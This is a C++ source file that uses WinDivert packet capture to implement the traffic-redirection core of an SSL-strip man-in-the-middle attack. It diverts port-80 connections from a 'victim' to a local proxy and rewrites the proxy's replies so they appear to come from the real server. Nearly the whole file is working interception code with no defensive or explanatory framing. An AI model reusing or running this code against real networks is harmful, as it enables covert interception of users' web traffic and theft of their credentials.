#include <QCoreApplication>
#include <QList>

#include <VApp>
#include <SnoopTypeKey>
#include <SnoopWinDivert>

#include <iostream>
using namespace std;

class SSLStripItem
{
public:
  SnoopTransportKey victim;
  SnoopTransportKey server;
  SnoopTransportKey proxy;
};

class SSLStripItemList : public QList<SSLStripItem>
{
public:
  SSLStripItem* findVS(SnoopTransportKey victim, SnoopTransportKey server)
  {
    for (SSLStripItemList::iterator it = begin(); it != end(); it++)
    {
      SSLStripItem& item = *it;
      if (item.victim.ip   != victim.ip) continue;
      if (item.victim.port != victim.port) continue;
      if (item.server.ip   != server.ip) continue;
      if (item.server.port != server.port) continue;
      return &item;
    }
    return NULL;
  }

  SSLStripItem* findPV(SnoopTransportKey proxy, SnoopTransportKey victim)
  {
    for (SSLStripItemList::iterator it = begin(); it != end(); it++)
    {
      SSLStripItem& item = *it;
      if (item.proxy.ip    != proxy.ip) continue;
      if (item.proxy.port  != proxy.port) continue;
      if (item.victim.ip   != victim.ip) continue;
      if (item.victim.port != victim.port) continue;
      return &item;
    }
    return NULL;
  }

};

int run()
{
  SnoopTransportKey proxy1;
  SnoopTransportKey proxy2;

  proxy1.ip   = Ip("192.168.10.9"); // gilgil temp
  proxy1.port = 80;

  proxy2.ip   =  Ip("192.168.10.9");
  proxy2.port = 81;

  SSLStripItemList proxy1List;
  SSLStripItemList proxy2List;

  SnoopWinDivert divert;
  divert.filter = "ifIdx!=1 and tcp.SrcPort==80 or tcp.DstPort==80";
  divert.autoRead = false;

  if (!divert.open())
  {
    cout << divert.error.msg << endl;
    return -1;
  }

  while (true)
  {
    SnoopPacket packet;
    packet.clear();
    int readLen = divert.read(&packet);
    if (readLen == VERR_FAIL) break;
    if (SnoopTcp::parseAll(&packet))
    {
      SnoopTransportKey src;
      src.ip = ntohl(packet.ipHdr->ip_src);
      src.port = ntohs(packet.tcpHdr->th_sport);

      SnoopTransportKey dst;
      dst.ip = ntohl(packet.ipHdr->ip_dst);
      dst.port = ntohs(packet.tcpHdr->th_dport);

      if (packet.divertAddr.Direction == DIVERT_DIRECTION_OUTBOUND)
      {
        LOG_DEBUG("outbound");

        if (dst.port == proxy1.port)
        {
          //
          // V>S ---> V>P
          //

          SSLStripItem* _item = proxy1List.findVS(src, dst);
          if (_item == NULL)
          {
            SSLStripItem item;
            item.victim = src;
            item.server = dst;
            item.proxy  = proxy1;
            proxy1List.push_back(item);
          }

          //
          // change dst ip and dst port
          //
          packet.ipHdr->ip_dst    = htonl(proxy1.ip);
          packet.tcpHdr->th_dport = htons(proxy1.port);

          packet.ipChanged = true;
          packet.tcpChanged = true;
        }
      }


      if (packet.divertAddr.Direction == DIVERT_DIRECTION_INBOUND)
      {
        LOG_DEBUG("inbound");
        //
        // P>V ---> S>V
        //
        SSLStripItem item;
        item.victim = src;
        item.server = dst;
        item.proxy  = proxy1;
        SSLStripItem* _item = proxy1List.findPV(src, dst);
        if (_item == NULL)
        {
          LOG_WARN("_item is null");
        } else
        {
          packet.ipHdr->ip_src    = htonl(_item->server.ip);
          packet.tcpHdr->th_sport = htons(_item->server.port);

          packet.ipChanged = true;
          packet.tcpChanged = true;
        }

      }
    }

    divert.relay(&packet);
  }

  return 0;
}

int main(int argc, char *argv[])
{
  QCoreApplication a(argc, argv);
  VApp::initialize();
  int res = run();
  VApp::finalize();
  return res;
}

